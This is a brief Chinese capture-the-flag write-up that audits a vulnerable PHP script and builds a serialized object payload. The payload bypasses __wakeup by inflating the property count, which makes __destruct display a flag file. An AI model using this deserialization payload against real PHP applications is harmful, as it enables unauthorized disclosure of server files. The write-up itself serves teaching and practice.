打开题目在线环境直接看到源码:
php
<?php
class X
{
public $x = __FILE__;
function __construct($x)
{
$this->x = $x;
}
function __wakeup()
{
if ($this->x !== __FILE__) {
$this->x = __FILE__;
}
}
function __destruct()
{
highlight_file($this->x);
//flag is in fllllllag.php
}
}
if (isset($_REQUEST['x'])) {
@unserialize($_REQUEST['x']);
} else {
highlight_file(__FILE__);
}审计这些php代码,是反序列化,然后根据这个构造pop链:
php
<?php
class X
{
public $x = 'fllllllag.php';
}
$a = new X;
echo serialize($a);
?>输出 的反序列化数据为:
*O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}
这里绕过weakup,修改 "X" 后的 1(成员属性数量) 大于 1(实际数量) 即可。
最后再用GET或者POST 方法传参得到flag。
